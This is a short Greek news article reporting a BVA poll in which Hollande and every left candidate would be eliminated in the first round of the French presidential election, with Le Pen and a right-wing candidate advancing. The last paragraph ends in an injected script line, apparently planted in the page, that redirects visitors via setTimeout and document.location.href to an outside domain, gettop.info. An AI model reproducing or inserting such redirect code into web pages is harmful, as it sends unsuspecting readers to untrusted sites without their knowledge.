Ολάντ και Αριστερά θα αποκλείονταν από τον α’ γύρο αν οι εκλογές διεξάγονταν σήμερα

0
6

 

Ήττα σοκ θα πάθαινε ο Φρανσουά Ολάντ αλλά και κάθε υποψήφιος της Αριστεράς αν οι εκλογές στη Γαλλία διεξάγονταν σήμερα καθώς σύμφωνα με δημοσκόπηση του ινστιτούτου BVA για τον περιφερειακό Τύπο και την Orange που δόθηκε σήμερα στη δημοσιότητα, θα αποκλειόταν από τον πρώτο γύρο.

Σύμφωνα με τα οκτώ σενάρια για την πρόθεση ψήφου με διαφορετικούς υποψηφίους της Αριστεράς και της Δεξιάς, σε όλα τα σενάρια ο πρόεδρος της Δημοκρατίας ηττάται με μεγάλη διαφορά, με τον πρώην υπουργό Οικονομίας της κυβέρνησής του, Εμανουέλ Μακρόν, να συγκεντρώνει μεγαλύτερο ποσοστό, ενώ φθάνει να συναγωνίζεται στήθος με στήθος ακόμη και με τον υποψήφιο του Κόμματος της Αριστεράς Ζαν-Λικ Μελανσόν.

Επίσης, σε όλα τα σενάρια, η υποψήφια του Εθνικού Μετώπου Μαρίν Λεπέν και ο υποψήφιος της Δεξιάς (ο Αλέν Ζιπέ ή ο Νικολά Σαρκοζί ή ο Μπρινό Λε Μερ) θα περνούσαν στον δεύτερο γύρο.

Στην περίπτωση όπου ο Εμανουέλ Μακρόν θα ήταν υποψήφιος και ο Αλέν Ζιπέ κέρδιζε τις προκριματικές εκλογές στη δεξιά, ο τελευταίος θα εξασφάλιζε ποσοστό 26% στην πρόθεση ψήφου, πίσω από τη Μαρίν Λεπέν (28%) και μπροστά από τον Μακρόν (16,5%), τον Ζαν-Λικ Μελανσόν (10%) και τον Φρανσουά Ολάντ (9%). setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here